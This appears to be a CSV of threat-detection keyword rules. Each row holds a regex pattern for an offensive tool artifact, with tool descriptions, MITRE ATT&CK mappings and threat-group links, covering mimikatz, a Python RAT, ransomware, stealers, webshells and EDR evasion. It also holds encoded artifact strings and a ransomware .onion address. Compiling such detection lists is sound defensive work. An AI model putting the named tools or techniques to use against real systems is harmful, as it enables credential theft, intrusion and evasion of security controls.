"*vu-ls/Crassus*",".{0,1000}vu\-ls\/Crassus.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","62308"
"*VVRKek1WVkdaM2RpUmtaWlRVZG9VVlpVUmxKYU1VSlVVVmMxWVUxcWJESlhha28wWWtacmVXRkliR2xOYWtaelYxWm9WMDFIU2pWT1dIQmhWMFZ2ZVZkc1pITmxWbXcxVGxkd2FVMXFRblZSTW5RMFUxWlJlRlJzVmtwU1JFSnVVMjV3Ums1Vk1YQk9TR2hQWVcxa01WUldUVEJsYTNBelkwVXhWbEpVYkZSV2EwNUNUMVZzUlZWVVFrNWtNMEpXVlRGVmVGSnNaM2h*",".{0,1000}VVRKek1WVkdaM2RpUmtaWlRVZG9VVlpVUmxKYU1VSlVVVmMxWVUxcWJESlhha28wWWtacmVXRkliR2xOYWtaelYxWm9WMDFIU2pWT1dIQmhWMFZ2ZVZkc1pITmxWbXcxVGxkd2FVMXFRblZSTW5RMFUxWlJlRlJzVmtwU1JFSnVVMjV3Ums1Vk1YQk9TR2hQWVcxa01WUldUVEJsYTNBelkwVXhWbEpVYkZSV2EwNUNUMVZzUlZWVVFrNWtNMEpXVlRGVmVGSnNaM2h.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62309"
"*vxCrypt0r/Voidgate*",".{0,1000}vxCrypt0r\/Voidgate.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","62310"
"*VXpCMk1UTjBjMU14YkhZemNsSTBibk13YlhjMGNqTQ*",".{0,1000}VXpCMk1UTjBjMU14YkhZemNsSTBibk13YlhjMGNqTQ.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","62311"
"*vyrus001/go-mimikatz*",".{0,1000}vyrus001\/go\-mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/vyrus001/go-mimikatz","1","1","N/A","N/A","10","7","619","105","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z","62312"
"*vysecurity/ANGRYPUPPY*",".{0,1000}vysecurity\/ANGRYPUPPY.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","62313"
"*vzzf6yg67cffqndnwg56e4psw45rup45f2mis7bwblg5fs7e5voagsqd.onion*",".{0,1000}vzzf6yg67cffqndnwg56e4psw45rup45f2mis7bwblg5fs7e5voagsqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62314"
"*-w *wordlists*.txt*",".{0,1000}\-w\s.{0,1000}wordlists.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","62315"
"*'W','i','n','d','o','w','s','\\','S','y','s','t','e','m','3','2'*",".{0,1000}\'W\',\'i\',\'n\',\'d\',\'o\',\'w\',\'s\',\'\\\\\',\'S\',\'y\',\'s\',\'t\',\'e\',\'m\',\'3\',\'2\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","62316"
"*'W','i','n','d','o','w','s','\\','S','y','s','t','e','m','3','2',*",".{0,1000}\'W\',\'i\',\'n\',\'d\',\'o\',\'w\',\'s\',\'\\\\\',\'S\',\'y\',\'s\',\'t\',\'e\',\'m\',\'3\',\'2\',.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","62317"
"*w00tw00tw00t*",".{0,1000}w00tw00tw00t.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","62318"
"*W0lLRUVYVF0NCk1FRElBPXJhc3RhcGkNClBvcnQ9VlBOMi0wDQpEZXZpY2U9V2FuIE1pbmlwb3J0IChJS0V2MikNCkRFVklDRT12cG4NClBob25lTnVtYmVyPTEyNy4wLjAuMQ==*",".{0,1000}W0lLRUVYVF0NCk1FRElBPXJhc3RhcGkNClBvcnQ9VlBOMi0wDQpEZXZpY2U9V2FuIE1pbmlwb3J0IChJS0V2MikNCkRFVklDRT12cG4NClBob25lTnVtYmVyPTEyNy4wLjAuMQ\=\=.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","62319"
"*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62320"
"*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkVDQg==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkVDQg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62321"
"*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpaZXJvcw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpaZXJvcw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62322"
"*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpBTlNJWDkyMw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpBTlNJWDkyMw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62323"
"*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpJU08xMDEyNg==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpJU08xMDEyNg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62324"
"*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","62325"
"*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*",".{0,1000}W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","62326"
"*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*",".{0,1000}W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","62327"
"*W2RlZmF1bHRdCmF3c19hY2Nlc3Nfa2V5X2lkID0gQUtJQTM1T0hYMkRTT1pHNjQ3TkgKYXdzX3NlY3JldF9hY2Nlc3Nfa2V5ID0gUXk5OVMrWkIvQ1dsRk50eFBBaWQ3Z0d6dnNyWGhCQjd1ckFDQUxwWgpvdXRwdXQgPSBqc29uCnJlZ2lvbiA9IHVzLWVhc3QtMg==*",".{0,1000}W2RlZmF1bHRdCmF3c19hY2Nlc3Nfa2V5X2lkID0gQUtJQTM1T0hYMkRTT1pHNjQ3TkgKYXdzX3NlY3JldF9hY2Nlc3Nfa2V5ID0gUXk5OVMrWkIvQ1dsRk50eFBBaWQ3Z0d6dnNyWGhCQjd1ckFDQUxwWgpvdXRwdXQgPSBqc29uCnJlZ2lvbiA9IHVzLWVhc3QtMg\=\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#base64  #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","62328"
"*W2RlZmF1bHRdCmF3c19zZWNyZXRfYWNjZXNzX2tleSA9IFF5OTlTK1pCL0NXbEZOdHhQQWlkN2dHenZzclhoQkI3dXJBQ0FMcFoKYXdzX2FjY2Vzc19rZXlfaWQgPSBBS0lBMzVPSFgyRFNPWkc2NDdOSApvdXRwdXQgPSBqc29uCnJlZ2lvbiA9IHVzLWVhc3QtMg==*",".{0,1000}W2RlZmF1bHRdCmF3c19zZWNyZXRfYWNjZXNzX2tleSA9IFF5OTlTK1pCL0NXbEZOdHhQQWlkN2dHenZzclhoQkI3dXJBQ0FMcFoKYXdzX2FjY2Vzc19rZXlfaWQgPSBBS0lBMzVPSFgyRFNPWkc2NDdOSApvdXRwdXQgPSBqc29uCnJlZ2lvbiA9IHVzLWVhc3QtMg\=\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#base64  #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","62329"
"*W2V4cGVyaW1lbnRhbF0gcGF0Y2ggVGVybWluYWwgU2VydmVyIHNlcnZpY2UgdG8gYWxsb3cgbXVsdGlwbGVzIHVzZXJz*",".{0,1000}W2V4cGVyaW1lbnRhbF0gcGF0Y2ggVGVybWluYWwgU2VydmVyIHNlcnZpY2UgdG8gYWxsb3cgbXVsdGlwbGVzIHVzZXJz.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62330"
"*W2V4cGVyaW1lbnRhbF0gcGF0Y2ggVGVybWluYWwgU2VydmVyIHNlcnZpY2UgdG8gYWxsb3cgbXVsdGlwbGVzIHVzZXJz*",".{0,1000}W2V4cGVyaW1lbnRhbF0gcGF0Y2ggVGVybWluYWwgU2VydmVyIHNlcnZpY2UgdG8gYWxsb3cgbXVsdGlwbGVzIHVzZXJz.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62331"
"*w32-speaking-shellcode.asm*",".{0,1000}w32\-speaking\-shellcode\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62335"
"*w32-speaking-shellcode.bin*",".{0,1000}w32\-speaking\-shellcode\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62336"
"*w32-speaking-shellcode-eaf.bin*",".{0,1000}w32\-speaking\-shellcode\-eaf\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62337"
"*w3af_gui*",".{0,1000}w3af_gui.{0,1000}","offensive_tool_keyword","w3af","w3af is a Web Application Attack and Audit Framework. The projects goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.","T1190 - T1211 - T1220 - T1222 - T1247 - T1592","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://w3af.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62339"
"*WaaSMedicPayload.dll*",".{0,1000}WaaSMedicPayload\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","62341"
"*WAF-bypass-Cheat-Sheet*",".{0,1000}WAF\-bypass\-Cheat\-Sheet.{0,1000}","offensive_tool_keyword","WAF-bypass-Cheat-Sheet","WAF/IPS/DLP bypass Cheat Sheet","T1210 - T1204 - T1061 - T1133 - T1190","TA0001 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet","1","1","N/A","N/A","N/A","5","422","65","2018-11-28T20:34:17Z","2018-11-28T19:34:02Z","62342"
"*wafw00f https://*",".{0,1000}wafw00f\shttps\:\/\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62343"
"*wafw00f*",".{0,1000}wafw00f.{0,1000}","offensive_tool_keyword","wafw00f","To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.","T1210.001 - T1190 - T1589","TA0007 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/EnableSecurity/wafw00f","1","1","N/A","N/A","N/A","10","5606","966","2024-12-31T06:49:33Z","2014-05-14T17:08:16Z","62344"
"*Waiting for rootkit response*",".{0,1000}Waiting\sfor\srootkit\sresponse.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","62345"
"*waleedassar/SimpleNTSyscallFuzzer*",".{0,1000}waleedassar\/SimpleNTSyscallFuzzer.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005  - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","N/A","7","2","145","25","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z","62346"
"*Walledx765ets/Binanedx765ce*",".{0,1000}Walledx765ets\/Binanedx765ce.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","62347"
"*Walledx765ets/Eleedx765ctrum*",".{0,1000}Walledx765ets\/Eleedx765ctrum.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","62348"
"*Walledx765ets/Ethedx765ereum*",".{0,1000}Walledx765ets\/Ethedx765ereum.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","62349"
"*WALLET=*.lolMinerWorker*",".{0,1000}WALLET\=.{0,1000}\.lolMinerWorker.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","62350"
